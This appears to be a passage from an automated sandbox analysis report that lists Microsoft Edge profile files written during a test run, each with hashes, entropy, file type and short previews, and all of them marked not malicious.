                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40504
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.561429291541622
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i71UkF7pLGLh1jWPLLfWq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVIckLTwVrw7jQox:i71UkTch1jWPLLfWqu1japckvwe7jngC
                                                                                                                                                                                                                                                                                          MD5:1B97428CEAFC5210447531AECC3790B2
                                                                                                                                                                                                                                                                                          SHA1:634633E5B7B0025BBD79596D958FC7CEE343DFC6
                                                                                                                                                                                                                                                                                          SHA-256:8CC328BC915FCEF673D50D13839F66F40B0F8FD2A234D70A355F9F795B57FD8C
                                                                                                                                                                                                                                                                                          SHA-512:BEA3C8699273C44D5F2ADBD1A65ECEAB76D63D2807725AA6BDAA234B2BD4D6C35CC0961463A201BD165ED40186E76A4449D686C11C488E2D568102BB0AFEF6A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.310432098978474
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.660 1f48 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/19-03:45:57.719 1f48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):1696115
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.040615305831622
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21196388110826
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.546 b6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-03:45:57.547 b6c Recovering log #3.2024/12/19-03:45:57.552 b6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):339
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.21196388110826
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.546 b6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/19-03:45:57.547 b6c Recovering log #3.2024/12/19-03:45:57.552 b6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4628110979398677
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):354
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.268748388287436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R4b+q2PcNwi23oH+TcwtnG2tMsIFUt8O8R4LZmw+O8ROubVkwOcNwi23oH+Tci:7GvLZYebn9GFUt8O//+OFuB54ZYebn9b
                                                                                                                                                                                                                                                                                          MD5:1C7F780861226B415D32C0E98F76156A
                                                                                                                                                                                                                                                                                          SHA1:597F50C64A2C5D03D262684FEB4AD8B00EAA88CA
                                                                                                                                                                                                                                                                                          SHA-256:A6DE6BEEB6AC59E35225F855CE8162A959AA77EEBA06A45A57B60E62E9424FA0
                                                                                                                                                                                                                                                                                          SHA-512:101BC652BD64FBBD73B8456B21DCE75879A198E5BAD1280E9CE57E6E3FBE4BBEA195830410169C55A2FC20D3E36ED4623801ED96BC81F123B143F4BAAEC30105
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.747 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-03:45:52.747 19e8 Recovering log #3.2024/12/19-03:45:52.748 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):354
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.268748388287436
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R4b+q2PcNwi23oH+TcwtnG2tMsIFUt8O8R4LZmw+O8ROubVkwOcNwi23oH+Tci:7GvLZYebn9GFUt8O//+OFuB54ZYebn9b
                                                                                                                                                                                                                                                                                          MD5:1C7F780861226B415D32C0E98F76156A
                                                                                                                                                                                                                                                                                          SHA1:597F50C64A2C5D03D262684FEB4AD8B00EAA88CA
                                                                                                                                                                                                                                                                                          SHA-256:A6DE6BEEB6AC59E35225F855CE8162A959AA77EEBA06A45A57B60E62E9424FA0
                                                                                                                                                                                                                                                                                          SHA-512:101BC652BD64FBBD73B8456B21DCE75879A198E5BAD1280E9CE57E6E3FBE4BBEA195830410169C55A2FC20D3E36ED4623801ED96BC81F123B143F4BAAEC30105
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.747 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/19-03:45:52.747 19e8 Recovering log #3.2024/12/19-03:45:52.748 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6122324130406155
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWbryMAqZxiJ:TLapR+DDNzWjJ0npnyXKUO8+jUep+xmL
                                                                                                                                                                                                                                                                                          MD5:556670A3B0C3043B4E277F864F6926B1
                                                                                                                                                                                                                                                                                          SHA1:1CBC04FDBDBBAB9217CF50FBF3AA4599CAA0492E
                                                                                                                                                                                                                                                                                          SHA-256:51E6405E3C28B37E1A62C7C144B99E2CEE88DE49709800D58D7E6D0E2A779106
                                                                                                                                                                                                                                                                                          SHA-512:D6D03C92692F917842CE5FBEE614AD20F6D6D153DB61758B26429F303F6B61140C7F6CF91E64A5407494D78D46A99894DA42EB77033867F5D02D9B75168E7082
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354135798592761
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:QA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:QFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                          MD5:5E2E099484F0BF6DF3DEEC6007C3F149
                                                                                                                                                                                                                                                                                          SHA1:6908253BDEBE0735BBEC135F3702D98506E35BF5
                                                                                                                                                                                                                                                                                          SHA-256:04D78ED23077137640C0785B2CA6B8D8C348F4755B60ACD7F65EC3557B278045
                                                                                                                                                                                                                                                                                          SHA-512:D640385E9CE9100AE15BD513130D10DDF732E8F8AC1D6F8A51DEE9CBD425FFBFE822248974EC057E41A0412F31E174C33391F1B58A3A831791FB7D739DA47C2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1N...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379071560310863..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1955463292093755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78R8ZM1cNwi23oH+Tcwtk2WwnvB2KLlp8R8g4q2PcNwi23oH+Tcwtk2WwnvIFUv:7VZ2ZYebkxwnvFLTVg4vLZYebkxwnQF2
                                                                                                                                                                                                                                                                                          MD5:59901CA327311C296BE3BFF02B52073C
                                                                                                                                                                                                                                                                                          SHA1:4D2697215A1FF8B696A0605D04F1C88C18A5DAC0
                                                                                                                                                                                                                                                                                          SHA-256:C3E4B5A1B36540EE2E66B97EB5E60353E0C5D6BE11D3A5C048F7DB67B797630F
                                                                                                                                                                                                                                                                                          SHA-512:5EA3CC667D7611B7629CE683704C21DE7B5BDE500FF036D4140FCC5838769957A2414D7E8C4C8F532F4E0BF572486A31B194AEB4FDE678AB1FC04013CE441924
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:57.545 da4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/19-03:45:57.578 da4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324612539973726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R0:C1gAg1zfvM
                                                                                                                                                                                                                                                                                          MD5:7FFC78D822CEC087D37DFCE8794B14BD
                                                                                                                                                                                                                                                                                          SHA1:9A654E28E4FEC644949CD57C03328CE24D1D1ED1
                                                                                                                                                                                                                                                                                          SHA-256:D4B0F08FF1BC0EF6D186DDC6F0FDE2DA24AF075ADF80356FCDE379A8F7E48E6A
                                                                                                                                                                                                                                                                                          SHA-512:69FED68B9744CBBED2DCFD30D4FE709890BB1BF4535BB5E4FDF34B7F0C41447F42E751F3A1B99D67B425DF4C74B28A5F9E5EC14F5D41489478E228E3E49B1385
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2312134838858
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:78Rw+q2PcNwi23oH+Tcwt8aPrqIFUt8O8RDXZmw+O8RD3VkwOcNwi23oH+Tcwt8h:7YvLZYebL3FUt8Ou/+OC54ZYebQJ
                                                                                                                                                                                                                                                                                          MD5:AAF8C36F2C6D55DE0450A96998B3934B
                                                                                                                                                                                                                                                                                          SHA1:39FB64A47A47D5A6AB2B10B910FAF2820901B271
                                                                                                                                                                                                                                                                                          SHA-256:8B56E69DF9C94CEA074C8F24B8C07F7F6092E808422CBD9ACE5819815C2DF7DD
                                                                                                                                                                                                                                                                                          SHA-512:FB700765BA0801D92CE8B1DCADA3091E037D5F91AEDDEC0201E5164A82F7B11B2DDA01B43E443CE56F93934625D6D50129B8D5BFDF9D7EFFAC9827396C373145
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/19-03:45:52.792 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-03:45:52.793 19e8 Recovering log #3.2024/12/19-03:45:52.793 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
